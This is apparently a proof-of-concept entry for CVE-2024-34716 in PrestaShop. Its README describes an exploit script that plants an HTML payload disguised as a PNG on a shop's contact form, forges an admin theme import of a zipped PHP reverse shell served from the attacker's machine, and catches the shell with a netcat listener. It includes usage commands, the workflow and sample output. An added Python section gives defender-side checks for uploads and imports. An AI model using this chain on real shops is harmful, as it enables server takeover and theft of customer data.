PoC details: a8b176686e4c62482da3bf0314e9e99134f1b60d

Source
Related vulnerability
Title: PrestaShop cross-site scripting vulnerability (CVE-2024-34716)
Description: PrestaShop is an open-source e-commerce solution from the US company PrestaShop. It offers multiple payment methods, SMS notifications, product image zoom and other features. PrestaShop versions before 8.1.6 contain a cross-site scripting vulnerability; the flaw arises from the application being susceptible to cross-site scripting attacks.
Introduction
> Seems broken for now, will update later.

# Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.

## Requirements

- **Netcat**: Ensure Netcat is installed and can listen on a specified port (default: 9001).
- **Python 3**: Used to serve files over HTTP.
- **curl & jq**: Used to send HTTP requests and parse the JSON responses.

## Usage

```bash
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
```

### Arguments

- `target_url`: Base URL of the target (e.g., `https://example.com`).
- `admin_endpoint`: Path to the admin theme import endpoint.
- `admin_email`: Email address of an administrator (to spoof for the payload).
- `attacker_ip`: IP address where the reverse shell listener will receive the connection.

### Example

```bash
./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
```

### Exploit Workflow

1. **Reverse Shell Creation**: Generates a PHP reverse shell using [revshells.com](https://www.revshells.com) with the provided `attacker_ip` and port `9001`.
2. **ZIP Packaging**: The reverse shell script (`love.php`) is compressed into `Love-exploit.zip`.
3. **CSRF Token Fetch**: Retrieves the CSRF token from the target to authorize the theme import request.
4. **HTML Payload Construction**: Builds an HTML payload (`csrf_payload.html`) containing JavaScript that automatically submits a malicious request to the target's admin panel to import the reverse shell.
5. **HTTP Server Setup**: A temporary HTTP server on port `8000` serves `Love-exploit.zip` for the target to import.
6. **XSS Upload and CSRF Trigger**: The CSRF payload is uploaded to the target’s contact page. When accessed, it triggers the CSRF attack.
7. **Reverse Shell Listener**: The attacker monitors incoming connections from the victim using Netcat.
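
The workflow above, seen from the shop operator's side: the two steps that are observable on the server are the HTML file dropped on the contact form under an image name (step 6, and the "Converting HTML to PNG" line in the example output) and the admin theme import that fetches its archive from a host other than the shop (steps 4 and 5). Because the payload page is hosted on the shop itself and the script already carries a fetched token (step 3), Origin/Referer and token checks alone do not break this chain; the upload-content and archive-source checks do. The following Python is an added example written for this page, not code from the exploit script or from PrestaShop. The form field names `_token` and `archive_url`, the `/upload/` path and every sample request are constructed assumptions.

```python
"""Defender-side checks for the CSRF -> theme-import chain described above.

Added example for this page; not code from the exploit script or from
PrestaShop. The form field names `_token` and `archive_url`, the upload
path and every sample request below are constructed assumptions.
"""
import hmac
from urllib.parse import urlparse

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Substrings a browser would act on if it sniffed the file as HTML.
HTML_MARKERS = (b"<html", b"<script", b"<svg", b"<iframe", b"javascript:")


def classify_upload(filename: str, data: bytes) -> list:
    """Reasons to reject a contact-form attachment; an empty list means clean."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "png" and not data.startswith(PNG_MAGIC):
        findings.append("declared .png but PNG signature missing")
    head = data[:65536].lower()
    hits = [m.decode() for m in HTML_MARKERS if m in head]
    if hits:
        findings.append("HTML markup inside attachment: " + ", ".join(hits))
    return findings


def check_theme_import(req: dict, site_origin: str, session_token: str) -> list:
    """Findings for one admin theme-import request.

    `req` is a constructed dict with keys method, headers and form. The
    same-origin and token checks are kept for completeness; against the chain
    above it is the external-archive check that fires.
    """
    findings = []
    site_host = urlparse(site_origin).hostname
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    form = req.get("form", {})
    if req.get("method", "GET").upper() != "POST":
        findings.append("state-changing import via non-POST method")
    origin = headers.get("origin") or headers.get("referer")
    if origin is None:
        findings.append("no Origin/Referer header")
    elif urlparse(origin).hostname != site_host:
        findings.append("cross-origin request from %s" % urlparse(origin).hostname)
    # Constant-time compare so the check itself leaks nothing about the token.
    if not hmac.compare_digest(form.get("_token", ""), session_token):
        findings.append("CSRF token missing or does not match session")
    archive_host = urlparse(form.get("archive_url", "")).hostname
    if archive_host and archive_host != site_host:
        findings.append("theme archive fetched from external host %s" % archive_host)
    return findings


# --- constructed samples ---------------------------------------------------
SITE = "https://shop.example"
SESSION_TOKEN = "c0ffee"  # token the admin's session actually holds (constructed)

BENIGN_PNG = PNG_MAGIC + b"\x00" * 32
# HTML saved under a .png name: the shape of the "HTML to PNG" step above.
POLYGLOT = b"<html><body><script>/* auto-submits the import form */</script></body></html>"

LEGIT_IMPORT = {
    "method": "POST",
    "headers": {"Origin": SITE, "Referer": SITE + "/admin-panel/themes"},
    "form": {"_token": SESSION_TOKEN, "archive_url": SITE + "/themes/classic.zip"},
}
# What the chain above produces: same-origin page, valid token, external archive
# served from the attacker's HTTP server on port 8000.
FORGED_IMPORT = {
    "method": "POST",
    "headers": {"Referer": SITE + "/upload/csrf_payload.png"},
    "form": {"_token": SESSION_TOKEN,
             "archive_url": "http://192.168.1.10:8000/Love-exploit.zip"},
}


def demo() -> dict:
    """Run every sample through the checks and return the findings by name."""
    return {
        "benign_upload": classify_upload("logo.png", BENIGN_PNG),
        "polyglot_upload": classify_upload("csrf_payload.png", POLYGLOT),
        "legit_import": check_theme_import(LEGIT_IMPORT, SITE, SESSION_TOKEN),
        "forged_import": check_theme_import(FORGED_IMPORT, SITE, SESSION_TOKEN),
    }


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "clean")
```

Running the module prints one line per sample; the forged import is clean on origin and token and is caught only by the archive-source rule, which is the point: for a theme import, the archive should come from the shop itself or an operator-approved host, and a contact-form attachment should be rejected when its bytes do not match the declared image type.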

## Execution Steps

1. Start a Netcat listener on your machine:
   ```bash
   nc -nvlp 9001
   ```

2. Run the script:
   ```bash
   ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
   ```

3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

## Output

The script outputs the following information during execution:

- CSRF token retrieval status.
- Status of reverse shell creation and packaging.
- Status of payload delivery and HTTP server status.

## Important Notes

- **Permissions**: This script requires permission to execute on the target server. Unauthorized use is illegal and punishable by law.
- **Testing Environment**: Use in a controlled, authorized environment only, such as a cybersecurity lab.
- **Port Conflicts**: Ensure ports `8000` (HTTP server) and `9001` (Netcat listener) are free before running the script.

---

### Example Output

```plaintext
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
```

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.

---

### Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.
File snapshot

```plaintext
[4.0K] /data/pocs/a8b176686e4c62482da3bf0314e9e99134f1b60d
├── [5.3K] CVE-2024-34716
└── [3.9K] README.md

0 directories, 2 files
```